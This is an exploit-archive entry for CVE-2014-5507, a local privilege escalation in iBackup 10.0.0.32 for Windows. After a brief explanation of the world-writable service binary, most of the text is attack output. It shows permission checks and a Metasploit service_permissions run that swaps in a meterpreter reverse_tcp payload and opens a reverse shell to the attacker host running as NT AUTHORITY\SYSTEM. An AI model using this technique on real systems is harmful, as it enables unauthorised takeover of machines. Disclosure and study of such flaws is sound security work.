Skip to content
cyberexploits
localwindowstext

iBackup 10.0.0.32 - Privilege Escalation

iBackup 10.0.0.32 - Privilege Escalation

Publié le 2014-10-22

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/local/35040.txt7eac4c3a
raw
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation

# Date: 23/01/2014

# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>

# Version: 10.0.0.32

# Vendor: IBackup

# Vendor URL: https://www.ibackup.com/

# CVE-2014-5507





Vulnerability Details

There are weak permissions for IBackupWindows default installation where everyone is allowed to change 

the ib_service.exe with an executable of their choice. When the service restarts or the system reboots

the attacker payload will execute on the system with SYSTEM privileges.





C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"

C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)

                                               NT AUTHORITY\SYSTEM:(I)(F)

                                               BUILTIN\Administrators:(I)(F)

                                               BUILTIN\Users:(I)(RX)



Successfully processed 1 files; Failed processing 0 files





C:\Users\0x414141>sc qc IBService

[SC] QueryServiceConfig SUCCESS



SERVICE_NAME: IBService

        TYPE               : 10  WIN32_OWN_PROCESS

        START_TYPE         : 2   AUTO_START

        ERROR_CONTROL      : 1   NORMAL

        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"

        LOAD_ORDER_GROUP   :

        TAG                : 0

        DISPLAY_NAME       : IBackup Service

        DEPENDENCIES       :

        SERVICE_START_NAME : LocalSystem







msf exploit(service_permissions) > sessions 



Active sessions

===============



  Id  Type                   Information                    Connection

  --  ----                   -----------                    ----------

  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)







msf exploit(service_permissions) > show options 



Module options (exploit/windows/local/service_permissions):



   Name        Current Setting  Required  Description

   ----        ---------------  --------  -----------

   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)

   SESSION     1                yes       The session to run this module on.





Payload options (windows/meterpreter/reverse_tcp):



   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)

   LHOST     192.168.0.100    yes       The listen address

   LPORT     4444             yes       The listen port





Exploit target:



   Id  Name

   --  ----

   0   Automatic





msf exploit(service_permissions) > exploit 



[*] Started reverse handler on 192.168.0.100:4444 

[*] Meterpreter stager executable 15872 bytes long being uploaded..

[*] Trying to add a new service...

[*] No privs to create a service...

[*] Trying to find weak permissions in existing services..

[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.

[*] Restarting IBService

[*] Could not restart IBService. Wait for a reboot. (or force one yourself)



Upon Reboot or Service Restart



[*] Sending stage (770048 bytes) to 192.168.0.102

[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > background 

[*] Backgrounding session 2...



msf exploit(service_permissions) > sessions -l



Active sessions

===============



  Id  Type                   Information                       Connection

  --  ----                   -----------                       ----------

  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)

  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC  192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)





Voir sur GitHub